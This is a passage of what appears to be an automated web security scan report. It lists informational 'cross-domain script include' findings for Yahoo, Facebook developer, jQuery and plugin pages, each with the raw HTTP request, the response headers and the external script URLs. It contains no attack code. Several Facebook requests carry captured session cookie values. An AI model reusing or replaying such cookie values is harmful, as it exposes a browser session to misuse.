Host: developer.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:18:43 GMT
Set-Cookie: B=d39814h6kj0v3&b=3&s=tc; expires=Tue, 02-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 27146

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>YUI Compressor</title>

<meta http-equiv="content-type" content="text/html; char
...[SNIP]...
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.2r1/build/yuiloader-dom-event/yuiloader-dom-event.js&3.2.0/build/yui/yui-min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
</html>

<script type="text/javascript"src="http://l.yimg.com/d/lib/rt/rto1_78.js"></script>
...[SNIP]...

18.103. http://developers.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET / HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 19:18:58 GMT
Content-Length: 13506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.104. http://developers.facebook.com/blog/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/blog/

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /blog/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 19:18:53 GMT
Content-Length: 28415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.105. http://developers.facebook.com/blog/archive previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/blog/archive

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /blog/archive HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 19:18:55 GMT
Content-Length: 88139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.106. http://developers.facebook.com/blog/post/377 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/blog/post/377

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /blog/post/377 HTTP/1.1
Host: developers.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsd=ErPUD; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; datr=8CJHTYhjyotVYfKpZ5B35lnF; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=86x22; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 16:17:19 GMT
Content-Length: 19747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/ya/r/sF_0-1qzmRi.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.107. http://developers.facebook.com/blog/post/377/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/blog/post/377/

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /blog/post/377/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 19:18:53 GMT
Content-Length: 19750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.108. http://developers.facebook.com/devgarage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/devgarage

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /devgarage HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 19:20:04 GMT
Content-Length: 43193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.109. http://developers.facebook.com/docs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/docs/

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /docs/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 19:19:02 GMT
Content-Length: 21620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.110. http://developers.facebook.com/docs/changelog previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/docs/changelog

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /docs/changelog HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 19:19:24 GMT
Content-Length: 15738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.111. http://developers.facebook.com/docs/opengraph previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/docs/opengraph

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /docs/opengraph HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 19:19:28 GMT
Content-Length: 31870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.112. http://developers.facebook.com/live_status previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/live_status

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /live_status HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 19:19:37 GMT
Content-Length: 19757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.113. http://developers.facebook.com/policy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/policy/

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /policy/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 19:20:13 GMT
Content-Length: 28174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.114. http://developers.facebook.com/roadmap previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/roadmap

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /roadmap HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 19:19:52 GMT
Content-Length: 17600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.115. http://developers.facebook.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/search

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /search HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 19:20:25 GMT
Content-Length: 10660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.116. http://developers.facebook.com/showcase/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/showcase/

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /showcase/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 19:19:32 GMT
Content-Length: 19493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.117. http://digitalbush.com/projects/masked-input-plugin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digitalbush.com
Path:	/projects/masked-input-plugin/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js
http://jquery-joshbush.googlecode.com/files/jquery.maskedinput-1.2.2.min.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /projects/masked-input-plugin/ HTTP/1.1
Host: digitalbush.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.24
Date: Wed, 02 Feb 2011 19:20:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: W3 Total Cache/0.8.5.2
Pragma: public
Expires: Wed, 02 Feb 2011 19:27:21 GMT
Last-Modified: Wed, 02 Feb 2011 18:27:21 GMT
Cache-Control: max-age=412, public, must-revalidate, proxy-revalidate
Vary: Cookie
Etag: 048eefcbb050e6509d78f2d17776d6fc
Content-Length: 37402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml"><head
profile="http://gmpg.org/xfn/1
...[SNIP]...
<![endif]--> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<link
rel='stylesheet' href='http://ajax.googleapis.com/ajax/libs/jqueryui/1.7/themes/south-street/jquery-ui.css' type="text/css" media="print, projection, screen"/> <script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js'></script>
...[SNIP]...
</div> <script src="http://jquery-joshbush.googlecode.com/files/jquery.maskedinput-1.2.2.min.js" type="text/javascript"></script>
...[SNIP]...
</script> <script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script> <script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

18.118. http://dillerdesign.com/experiment/DD_belatedPNG/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dillerdesign.com
Path:	/experiment/DD_belatedPNG/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /experiment/DD_belatedPNG/ HTTP/1.1
Host: dillerdesign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:18:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.16
Connection: close
Content-Type: text/html
Content-Length: 30282

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
               <!--
           DD_belatedPNG is free software under the MIT License: http://dillerdes
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="diggbox">
                   <script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...

18.119. http://docs.jquery.com/UI previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:31:41 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
